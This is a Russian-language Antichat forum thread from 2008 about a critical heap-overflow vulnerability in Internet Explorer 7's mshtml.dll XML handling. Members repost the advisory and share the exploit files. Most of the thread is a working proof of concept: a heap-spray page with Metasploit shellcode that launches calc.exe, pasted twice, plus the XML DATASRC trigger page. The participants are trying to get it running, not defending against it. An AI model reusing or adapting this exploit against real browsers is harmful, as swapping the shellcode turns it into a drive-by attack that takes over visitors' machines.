ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Soft - Windows
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Выполнение произвольного кода в Microsoft Internet Explorer 7
  #1  
Старый 10.12.2008, 19:42
Аватар для denjf
denjf
Участник форума
Регистрация: 12.11.2008
Сообщений: 146
Провел на форуме:
592199

Репутация: 21
По умолчанию Выполнение произвольного кода в Microsoft Internet Explorer 7

10 декабря, 2008

Программа: Microsoft Internet Explorer 7.x

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за ошибки проверки границ данных при обработке XML тегов в библиотеке mshtml.dll. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.

Примечание: уязвимость активно эксплуатируется в настоящее время.

URL производителя: www.microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Журнал изменений:

10.12.2008
Изменено описание уязвимости.
10.12.2008
Изменено описание уязвимости. Добавлены новые данные.
10.12.2008
Добавлен PoC код.

Пробуем!!! И помогите разобратся как работает??? Я 2 файла html качнул один из них фрайм! Так как допустим Calc.exe запустить???
 
Ответить с цитированием

  #2  
Старый 10.12.2008, 20:02
Аватар для nepster
nepster
Участник форума
Регистрация: 14.01.2008
Сообщений: 132
Провел на форуме:
404369

Репутация: 26
Отправить сообщение для nepster с помощью ICQ
По умолчанию

Откуда инфа?
 
Ответить с цитированием

  #3  
Старый 10.12.2008, 20:04
Аватар для P3L3NG
P3L3NG
Banned
Регистрация: 04.06.2008
Сообщений: 402
Провел на форуме:
2267346

Репутация: 719
По умолчанию

www.securitylab.ru вроде отсюда
 
Ответить с цитированием

  #4  
Старый 10.12.2008, 20:05
Аватар для Dimo4ka14
Dimo4ka14
Постоянный
Регистрация: 23.12.2005
Сообщений: 363
Провел на форуме:
1024832

Репутация: 233
По умолчанию

Цитата:
Пробуем!!! И помогите разобратся как работает??? Я 2 файла html качнул один из них фрайм! Так как допустим Calc.exe запустить???
что ты качнул? и что пробывать?
 
Ответить с цитированием

  #5  
Старый 10.12.2008, 20:08
Аватар для denjf
denjf
Участник форума
Регистрация: 12.11.2008
Сообщений: 146
Провел на форуме:
592199

Репутация: 21
По умолчанию

Цитата:
<html>
<script>

// k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13

// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u01 78%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee %u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u 0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb 01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456 %u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u 6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a 43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d %u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0a0a%u0a0a");
var nops = unescape("%u9090%u9090%u9090");


while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);

document.write("<iframe src=\"iframe.html\">");

</script>


</html>
первый файл
Цитата:
<html>
<script>

// k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13

// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u01 78%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee %u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u 0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb 01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456 %u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u 6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a 43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d %u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0a0a%u0a0a");
var nops = unescape("%u9090%u9090%u9090");


while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);

document.write("<iframe src=\"iframe.html\">");

</script>


</html>
и второй.
скачал с www.securitylab.ru
 
Ответить с цитированием

  #6  
Старый 10.12.2008, 20:10
Аватар для denjf
denjf
Участник форума
Регистрация: 12.11.2008
Сообщений: 146
Провел на форуме:
592199

Репутация: 21
По умолчанию

Цитата:
<XML ID=I>
<X>
<C>
<![CDATA[
<image
SRC=http://ਊਊ.xxxxx.org
>
]]>

</C>
</X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>
второй файл
 
Ответить с цитированием

  #7  
Старый 10.12.2008, 20:11
Аватар для denjf
denjf
Участник форума
Регистрация: 12.11.2008
Сообщений: 146
Провел на форуме:
592199

Репутация: 21
По умолчанию

у меня calc не запустился!!!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ